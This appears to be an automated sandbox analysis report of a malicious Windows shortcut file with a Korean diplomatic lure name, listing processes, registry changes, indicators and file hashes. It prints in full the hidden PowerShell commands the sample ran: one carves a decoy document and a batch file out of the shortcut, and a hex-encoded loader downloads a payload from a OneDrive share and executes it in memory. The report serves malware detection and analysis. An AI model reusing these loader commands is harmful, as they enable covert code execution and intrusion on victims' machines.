6234ef67435dfcb65bd661b5f3bb0b77b82fe6cdd2109b6dfb9dea1b65a17d5d

Analysis

max time kernel
150s
max time network
144s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
04-04-2023 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

북 외교관 선발파견 및 해외공관.lnk
Size

29.7MB
MD5

657fd7317ccde5a0e0c182a626951a9f
SHA1

edb782f50c899555506150e097f6346deb3f6fb1
SHA256

c5c05f9df89fc803884fed2bd20a3824eae95eeb34a1827bf5210e4ac17beadd
SHA512

4ee451076b5adaae332d64559cae16482f6d2fd30292f50dbe9d21a7030621e71fe119b6532ec6a7ac1ef6c37e022dbea648db268bdfeb2bbabec281b03ec29e
SSDEEP

1536:f8hPldX8h7lPA7X2vmVMlMVMlcPYf+a+NsAJ93:fGV7bXhPYf+Fsa93

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exe

flow	pid	process
4	1900	powershell.exe
6	1900	powershell.exe
8	1900	powershell.exe
9	1900	powershell.exe
10	1900	powershell.exe
11	1900	powershell.exe
12	1900	powershell.exe
13	1900	powershell.exe
14	1900	powershell.exe
15	1900	powershell.exe
16	1900	powershell.exe
18	1900	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 9 IoCs

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\hwp_auto_file\shell\Read\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\hwp_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_Classes\Local Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\hwp_auto_file\	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\.hwp	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\.hwp\ = "hwp_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\hwp_auto_file\shell\Read	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\hwp_auto_file	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\hwp_auto_file\shell	rundll32.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

cmd.exe

pid process

1680 cmd.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1888 powershell.exe
1900 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1888 powershell.exe
Token: SeDebugPrivilege 1900 powershell.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

AcroRd32.exe

pid process

1672 AcroRd32.exe
1672 AcroRd32.exe
1672 AcroRd32.exe

pid	process
1680	cmd.exe

pid	process
1888	powershell.exe
1900	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe

pid	process
1672	AcroRd32.exe
1672	AcroRd32.exe
1672	AcroRd32.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exerundll32.exepowershell.execsc.execsc.execsc.execsc.exe

description	pid	process	target process
PID 1716 wrote to memory of 1680	1716	cmd.exe	cmd.exe
PID 1716 wrote to memory of 1680	1716	cmd.exe	cmd.exe
PID 1716 wrote to memory of 1680	1716	cmd.exe	cmd.exe
PID 1716 wrote to memory of 1680	1716	cmd.exe	cmd.exe
PID 1680 wrote to memory of 1888	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 1888	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 1888	1680	cmd.exe	powershell.exe
PID 1680 wrote to memory of 1888	1680	cmd.exe	powershell.exe
PID 1888 wrote to memory of 1144	1888	powershell.exe	rundll32.exe
PID 1888 wrote to memory of 1144	1888	powershell.exe	rundll32.exe
PID 1888 wrote to memory of 1144	1888	powershell.exe	rundll32.exe
PID 1888 wrote to memory of 1144	1888	powershell.exe	rundll32.exe
PID 1888 wrote to memory of 1144	1888	powershell.exe	rundll32.exe
PID 1888 wrote to memory of 1144	1888	powershell.exe	rundll32.exe
PID 1888 wrote to memory of 1144	1888	powershell.exe	rundll32.exe
PID 1888 wrote to memory of 1532	1888	powershell.exe	cmd.exe
PID 1888 wrote to memory of 1532	1888	powershell.exe	cmd.exe
PID 1888 wrote to memory of 1532	1888	powershell.exe	cmd.exe
PID 1888 wrote to memory of 1532	1888	powershell.exe	cmd.exe
PID 1532 wrote to memory of 1628	1532	cmd.exe	cmd.exe
PID 1532 wrote to memory of 1628	1532	cmd.exe	cmd.exe
PID 1532 wrote to memory of 1628	1532	cmd.exe	cmd.exe
PID 1532 wrote to memory of 1628	1532	cmd.exe	cmd.exe
PID 1628 wrote to memory of 1900	1628	cmd.exe	powershell.exe
PID 1628 wrote to memory of 1900	1628	cmd.exe	powershell.exe
PID 1628 wrote to memory of 1900	1628	cmd.exe	powershell.exe
PID 1628 wrote to memory of 1900	1628	cmd.exe	powershell.exe
PID 1144 wrote to memory of 1672	1144	rundll32.exe	AcroRd32.exe
PID 1144 wrote to memory of 1672	1144	rundll32.exe	AcroRd32.exe
PID 1144 wrote to memory of 1672	1144	rundll32.exe	AcroRd32.exe
PID 1144 wrote to memory of 1672	1144	rundll32.exe	AcroRd32.exe
PID 1900 wrote to memory of 1260	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 1260	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 1260	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 1260	1900	powershell.exe	csc.exe
PID 1260 wrote to memory of 320	1260	csc.exe	cvtres.exe
PID 1260 wrote to memory of 320	1260	csc.exe	cvtres.exe
PID 1260 wrote to memory of 320	1260	csc.exe	cvtres.exe
PID 1260 wrote to memory of 320	1260	csc.exe	cvtres.exe
PID 1900 wrote to memory of 1600	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 1600	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 1600	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 1600	1900	powershell.exe	csc.exe
PID 1600 wrote to memory of 1760	1600	csc.exe	cvtres.exe
PID 1600 wrote to memory of 1760	1600	csc.exe	cvtres.exe
PID 1600 wrote to memory of 1760	1600	csc.exe	cvtres.exe
PID 1600 wrote to memory of 1760	1600	csc.exe	cvtres.exe
PID 1900 wrote to memory of 888	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 888	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 888	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 888	1900	powershell.exe	csc.exe
PID 888 wrote to memory of 1576	888	csc.exe	cvtres.exe
PID 888 wrote to memory of 1576	888	csc.exe	cvtres.exe
PID 888 wrote to memory of 1576	888	csc.exe	cvtres.exe
PID 888 wrote to memory of 1576	888	csc.exe	cvtres.exe
PID 1900 wrote to memory of 308	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 308	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 308	1900	powershell.exe	csc.exe
PID 1900 wrote to memory of 308	1900	powershell.exe	csc.exe
PID 308 wrote to memory of 1256	308	csc.exe	cvtres.exe
PID 308 wrote to memory of 1256	308	csc.exe	cvtres.exe
PID 308 wrote to memory of 1256	308	csc.exe	cvtres.exe
PID 308 wrote to memory of 1256	308	csc.exe	cvtres.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\북 외교관 선발파견 및 해외공관.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0001DAB452} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00065446 -ReadCount 00065446; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\230401.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002470)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00068696 -ReadCount 00068696; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230401.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00065446)) -Encoding Byte; ^& $exePath;
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0001DAB452} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00065446 -ReadCount 00065446; $pdfPath = 'C:\Users\Admin\AppData\Local\Temp\230401.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 002470)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00068696 -ReadCount 00068696; $exePath = 'C:\Users\Admin\AppData\Local\Temp\230401.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00065446)) -Encoding Byte; & $exePath;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\230401.hwp
4⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1144

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\230401.hwp"
5⤵
- Suspicious use of SetWindowsHookEx
PID:1672

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\230401.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:1532

\??\c:\Windows\SysWOW64\cmd.exe
c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$ppams ="$eric5="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C3355766379464264544A746554463461445A304F46686E556A4A4E656D317A4F47356F556E64764C545A4350325539616B6849517A5A352F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
5⤵
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "$ppams ="$eric5="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C3355766379464264544A746554463461445A304F46686E556A4A4E656D317A4F47356F556E64764C545A4350325539616B6849517A5A352F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$bulst="""""";for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hk2ic7k0.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:1260

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES408B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC408A.tmp"
8⤵
PID:320

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phvwbjk6.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4118.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4117.tmp"
8⤵
PID:1760

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mknqsayr.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES427E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC427D.tmp"
8⤵
PID:1576

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rzwh7zmy.cmdline"
7⤵
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4462.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4461.tmp"
8⤵
PID:1256

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\230401.bat
Filesize
3KB

MD5
461ce7d6c6062d1ae33895d1f44d98fb

SHA1
76e9c63f48121faf26bc1046eac27ec6967e64d4

SHA256
70f9216f0c5badb24120f74270dbbc5100b07c4fc6eb45f6652b00882290a73c

SHA512
680e1503a4ce7fe49ebe559531102710a2b50e59ee65d6aa20a0af1d8a58a4986f198c8f03a58bdb13fcc76cedc9724812e8948a42b45c8a6066bb250554f03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\230401.bat
Filesize
3KB

MD5
461ce7d6c6062d1ae33895d1f44d98fb

SHA1
76e9c63f48121faf26bc1046eac27ec6967e64d4

SHA256
70f9216f0c5badb24120f74270dbbc5100b07c4fc6eb45f6652b00882290a73c

SHA512
680e1503a4ce7fe49ebe559531102710a2b50e59ee65d6aa20a0af1d8a58a4986f198c8f03a58bdb13fcc76cedc9724812e8948a42b45c8a6066bb250554f03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\230401.hwp
Filesize
61KB

MD5
4d8f06ef3aeb2cab6d12bbbac91fd47d

SHA1
338d3dd9245ac3b97eb6ef99d5c14f45b15d94b4

SHA256
d3157ace97c1657dd1b3db0eed969eb4f0587b85f98ce9bff879754613dde219

SHA512
823f28b2827b9fcf30e5228c1fb166c9fe73a8f28d7e679f0510d527e4088f8b65017654a8a75c7f436fa13403b0ebf6d40a22df0ae72eab5aeeb68169ce9472

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES408B.tmp
Filesize
1KB

MD5
091632e02d3e77ceacb3d21290314f1c

SHA1
e933bdd6151a96a3ef597fffe46881bf71b80e14

SHA256
7ad4cfb258ec472d77d5e0c9e0f480e3b578eb9b44a81a7fa1d63ab3beeac8b7

SHA512
623445912ebea77adde04ca573d6b815a74199cb6dd98f59762992c29ee6d832053a14a8c92c98eaa1a53f23afefc36e4d0e9c0d8d2467e77c2ef14a67d410e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4118.tmp
Filesize
1KB

MD5
77e21d2c787e57fb2cb46f55bbc60331

SHA1
6d382e4abd16c97812c3bd0184779b2921cfd06a

SHA256
6e7a06684e5703fd6005e6ea451ac03b507cef501a1394f0972a3e3af3ded950

SHA512
2cfd5b3dc4a6cc8d5942f1ac673d527668b4c927570f5bd5219e6cfa681042f2cf0e2d40b3fbc7fd77a367b9532fb6cbb8a0c628c2ba51746bb9e21a989424d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES427E.tmp
Filesize
1KB

MD5
ffa3c11ec62b401c3af929d1e5588da8

SHA1
61c8341117c484e7894c34b46ffc6ab640cce4e5

SHA256
d0d48481b5dacdd821c453c6d37c2b0e6473371da4208ab2030a66535cea6907

SHA512
2157867a54b7e4c320895de8e6fadbec21e0abd0d4055b6a07bde281fd8c72315568ab59bb505cd22de24e268cafa7c93a1b57ba1c89400e4bda4f30370b531b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4462.tmp
Filesize
1KB

MD5
1debdba5a4dc0163586acf0a550a843d

SHA1
a165c346971ac2beafd4e1b9735079e422a21ec1

SHA256
1497f12b6ce5f31b04066ed1abd810dea9f242001a35bf3e497b45fddd621733

SHA512
079e75816d0aaf3d6340bd2a3a73610904fc2505d021aa14ebf6a5a4bb2ab312836d075bcfac745ba8c969933e45f9965a18376547ed694d7a548c020d2c69bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6495.tmp
Filesize
161KB

MD5
be2bec6e8c5653136d3e72fe53c98aa3

SHA1
a8182d6db17c14671c3d5766c72e58d87c0810de

SHA256
1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd

SHA512
0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\hk2ic7k0.dll
Filesize
3KB

MD5
9fd3e4fc3a8defb00f134fc9d2f5ab2f

SHA1
10d4fe1b9cba0bdec9350b17e1fd3e89788e5a40

SHA256
faac381cf1989c633b4f83ae62e6d98437f141de6117b7a6491bb4f53abd427a

SHA512
ca629db779037613bd49f70fc4dee400dacff8d5479d20de5059afc9d8d3a5c4e20ccae56f73b0742d03c4f2af135e23135a1081f7048cf7179daaa59508e74a

Download Submit
C:\Users\Admin\AppData\Local\Temp\hk2ic7k0.pdb
Filesize
7KB

MD5
d254430d916c4243965262aa5ee85d91

SHA1
6413bbe7f8dfca30691baefc863da085b36e3ec0

SHA256
397909d2a72d87782194c1bc19310bd2b74c24c652ad627204a18a3da1859077

SHA512
904f2835c87aaacef51f7f97378aa0d6897837e2e47d275896e544a50b691edaddd7bf290b2377bb4efb6900ba6544001eb7c62b76421c69a6378e4231559b00

Download Submit
C:\Users\Admin\AppData\Local\Temp\mknqsayr.dll
Filesize
3KB

MD5
b005d5abf64b9147dfccf53ff2fd2b16

SHA1
d21104ea5c1968a1c8e3d9ec914ae92515d47f00

SHA256
081860037dc6677b773dfdd169ce41c4564ba9d8efa86d11bfb533e476a99bc6

SHA512
5dfbbb065281947e6a4f490980c45dae4660f6bdb3e097b90aa5e37f559594fd1daa66672ed44e27ecb60f7cda02274af46595ea52478b916389aa5013db199c

Download Submit
C:\Users\Admin\AppData\Local\Temp\mknqsayr.pdb
Filesize
7KB

MD5
71a51f2ada270fafb682bc631c9f6349

SHA1
9069b25397982ce1a49ee5e1985b870758f68d82

SHA256
1e9161d3d85effbf39dfc1ee02e75219d6ef7dcc2ebd194c9577e595a99562b1

SHA512
c5b4a2491c7da585f2e72210156278b19b7a986eec5cff5a0428da8862a205820fcfb10ff16378e5115fb48fc4ae95a5d3070144b48aaddfdfa14aac17b541f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\phvwbjk6.dll
Filesize
3KB

MD5
1210c0d0048c79f9848db03ec285acd8

SHA1
01e8271bb014dad88318e7680e04ec746f4cd371

SHA256
55682ffc247fc0a33d76d4f019b0a6c7dcd603188a7961b265108be4bdfdea37

SHA512
e9ab68d900f1e7fcf871c8520155ae0162a40d7e5da96de7aef576ea021e6d756403b5df3fd4cc0d8915ebd149d84f16cb95a383beded08c4a50ea2cc8ecb9d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\phvwbjk6.pdb
Filesize
7KB

MD5
2e48be616da20b36e2fb23179a44c57a

SHA1
4c2d8f9c5e6cff54f2553c5341927df972053fcb

SHA256
3f4eeee66ae1100f0bc39cd54c51fc0510cd913b5a50cbf6b66408e12ad31b17

SHA512
9abd7bee246319ee8d7d7b39dc017bd190d1ec840328e9c11c70698b5a082f6e75cd84fa6b9abca5459d83d1dd9fe10a42a34f8dcca5b64444f5dd226c0a1be0

Download Submit
C:\Users\Admin\AppData\Local\Temp\rzwh7zmy.dll
Filesize
3KB

MD5
5427ea39c67f88e68bfa946fcf0adf9b

SHA1
489a0d6c98d6cc9a749d84683df613df65b9c846

SHA256
b8bce2e51f864a0637491140ab519930d21b51897d837bdc6ad76c53041bcdcc

SHA512
2d83a157a229649ce9d812e53e96e1a1d6780e0ae12c58dc647065523984b57b1f87084a0d3450690df9a78c577bf34db204608c033983c73ec8a312d3c13c9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\rzwh7zmy.pdb
Filesize
7KB

MD5
2522bc26e2717136ea9fbbc02916f2ff

SHA1
9c1a2853631e6da94de40da549297c02fd2e9c14

SHA256
83dbbda30731b90d63655961475643b29f7782ff6ecbbb2d0831da489727ef35

SHA512
d424e655882bc43813cdf2deca9facfc1294f8d1f984a38c4b4f4ed24a22459365c29c053fa59d874249715cfbe467240e2905da05e94f0f723e99ec0afcfaa3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q67LU3XTS2BYPJ61JLRM.temp
Filesize
7KB

MD5
f2ac1ee7d6f0e1579151b4006c1ac213

SHA1
ce486ac25330c7cbb13129f667183fbf6743707b

SHA256
c56f2f37f78f138abd0b37f61548ed08375926882081a34300ba634458a8f4b0

SHA512
7edb2bd050c320f7f664cc7123d2b0c2816d8fd1914cd3da2dc4d5107a2780ba02625ef2882cc39b059408800f54ac6633843b04cf352c61cbfb80001bbf1470

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
f2ac1ee7d6f0e1579151b4006c1ac213

SHA1
ce486ac25330c7cbb13129f667183fbf6743707b

SHA256
c56f2f37f78f138abd0b37f61548ed08375926882081a34300ba634458a8f4b0

SHA512
